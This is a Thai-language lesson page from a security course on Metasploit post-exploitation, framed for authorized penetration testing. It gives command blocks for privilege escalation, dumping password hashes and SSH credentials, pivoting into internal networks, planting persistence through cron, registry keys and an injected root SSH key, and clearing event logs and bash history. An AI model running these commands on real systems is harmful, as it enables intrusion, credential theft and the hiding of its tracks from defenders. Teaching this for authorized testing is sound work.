หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่
ใช้โมดูลหลังการเจาะระบบของ Metasploit เพื่อยกระดับสิทธิ์ ดึงข้อมูลประจำตัว และสร้างการคงอยู่
หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่ เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
เป้าหมายหลังการใช้ประโยชน์จากช่องโหว่
หลังจากเข้าถึงระบบในระยะแรก เป้าหมายของผู้โจมตีคือ ยกระดับสิทธิ์ รวบรวมข่าวกรอง รักษาการเข้าถึงอย่างต่อเนื่อง และเคลื่อนที่ไปยังระบบอื่นเพื่อเข้าถึงเป้าหมายที่แท้จริง (ข้อมูล ระบบ การควบคุมโดเมน)
การตระหนักรู้ตามสถานการณ์
ขั้นตอนแรกหลังได้เชลล์คือทำความเข้าใจว่าคุณอยู่ที่ใด รวบรวมข้อมูลระบบ การกำหนดค่าเครือข่าย สิทธิ์ของผู้ใช้ปัจจุบัน กระบวนการที่กำลังทำงาน และตัวแปรสภาพแวดล้อม
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_systemการยกระดับสิทธิ์
การยกระดับสิทธิ์ภายในเครื่องคือการเปลี่ยนจากเชลล์ที่มีสิทธิ์ต่ำไปเป็น root/SYSTEM local_exploit_suggester ของ Metasploit จะระบุโค้ดโจมตีช่องโหว่ระดับเคอร์เนลหรือภายในเครื่องที่ใช้ได้ โดยอ้างอิงจากรุ่น OS ของเป้าหมาย
meterpreter > run post/multi/recon/local_exploit_suggester
# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > runการเก็บเกี่ยวข้อมูลรับรอง
รวบรวมข้อมูลรับรอง ได้แก่ รหัสผ่านที่ผ่านการแฮช ข้อมูลรับรองแบบข้อความธรรมดาในไฟล์การกำหนดค่า รหัสผ่านที่บันทึกไว้ในเบราว์เซอร์ และคีย์ SSH สิ่งเหล่านี้ช่วยให้เคลื่อนที่ไปยังระบบอื่นและรักษาการเข้าถึงได้
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds
# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/envการใช้เครื่องเป็นทางผ่าน: การส่งต่อพอร์ต
การใช้เครื่องเป็นทางผ่านคือการใช้โฮสต์ที่ถูกเจาะเป็นสะพานเพื่อเข้าถึงเครือข่ายภายในที่แยกออกมา portfwd ของ Metasploit จะสร้างการส่งต่อพอร์ตภายในเครื่องผ่านเซสชัน Meterpreter
# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20
# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u rootการกำหนดเส้นทางผ่านเซสชัน
โมดูล route ของ Metasploit จะเพิ่มเส้นทางเครือข่ายผ่านเซสชัน ทำให้โมดูลอื่นเข้าถึงเครือข่ายที่เข้าถึงได้เฉพาะผ่านโฮสต์ทางผ่าน
msf6 > route add 10.10.10.0/24 1 # route via session 1
msf6 > route print
# Now run modules targeting 10.10.10.x
# through session 1 as pivotการใช้พร็อกซี SOCKS เป็นทางผ่าน
พร็อกซี Socks ผ่าน Metasploit (หรือ chisel/ssh -D) ช่วยให้คุณกำหนดเส้นทางเครื่องมือใด ๆ ผ่านโฮสต์ทางผ่านโดยใช้ proxychains ทำให้ nmap, curl และเบราว์เซอร์เข้าถึงเครือข่ายภายในได้
# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24กลไกการรักษาการเข้าถึง
การรักษาการเข้าถึงช่วยให้ยังเข้าถึงระบบได้หลังการรีบูตและการสูญเสียเซสชัน วิธีทั่วไป ได้แก่ งาน cron (Linux), คีย์ run ในรีจิสทรี (Windows), การแทรก SSH authorized_keys และการติดตั้งบริการ
# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence
# Windows: registry
meterpreter > run post/windows/manage/persistence_exe
# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysการลบร่องรอย
ผู้โจมตีล้างบันทึกเพื่อรักษาความลับ หมายเหตุด้านความปลอดภัย: โซลูชัน SIEM และ EDR สมัยใหม่จะส่งบันทึกออกจากโฮสต์แบบเรียลไทม์ การล้างบันทึกภายในเครื่องจึงไม่ได้ลบระเบียนที่เก็บไว้ส่วนกลาง
meterpreter > clearev # clear Windows event logs
# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_historyโมดูลหลังการใช้ประโยชน์จากช่องโหว่
Metasploit มีโมดูลหลังการใช้ประโยชน์จากช่องโหว่หลายร้อยรายการสำหรับ Windows และ Linux ได้แก่ การรวบรวมข้อมูลรับรอง ข้อมูลเบราว์เซอร์ การบันทึกการกดแป้นพิมพ์ การจับภาพหน้าจอ และการแจกแจงข้อมูลเครือข่าย
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > runการรู้ว่าเมื่อใดควรหยุด
ในการทดสอบการเจาะระบบที่ได้รับอนุญาต ให้หยุดเมื่อบรรลุเป้าหมายตามขอบเขตที่ตกลงกันไว้ หรือพบข้อมูลที่คุณไม่ได้รับอนุญาตให้เข้าถึง จัดทำเอกสารเส้นทางที่ดำเนินการอย่างรอบคอบ — นี่คือห่วงโซ่การโจมตีที่คุณจะรายงาน
ตรวจสอบอย่างรวดเร็ว
คำสั่ง "route add" ของ Metasploit ช่วยให้ทำสิ่งใดได้
สรุป: การทำงานหลังการใช้ประโยชน์จากช่องโหว่
การทำงานหลังการใช้ประโยชน์จากช่องโหว่ต่อยอดจากการเข้าถึงระบบในระยะแรกเพื่อสร้างผลกระทบที่แท้จริง ได้แก่ การยกระดับสิทธิ์ การเก็บเกี่ยวข้อมูลรับรอง การเคลื่อนที่ไปยังระบบอื่น และการรักษาการเข้าถึง Metasploit มีโมดูลหลังการใช้ประโยชน์จากช่องโหว่สำหรับแต่ละระยะ จัดทำเอกสารทุกขั้นตอน — ห่วงโซ่การโจมตีตั้งแต่ทางเข้าไปจนถึงเป้าหมายคือผลงานส่งมอบหลักของการทดสอบการเจาะระบบ
คำถามที่พบบ่อย
บทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่”
ใช้โมดูลหลังการเจาะระบบของ Metasploit เพื่อยกระดับสิทธิ์ ดึงข้อมูลประจำตัว และสร้างการคงอยู่ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน
บทเรียน “หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit และ msfconsole
- การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
- เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
- หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่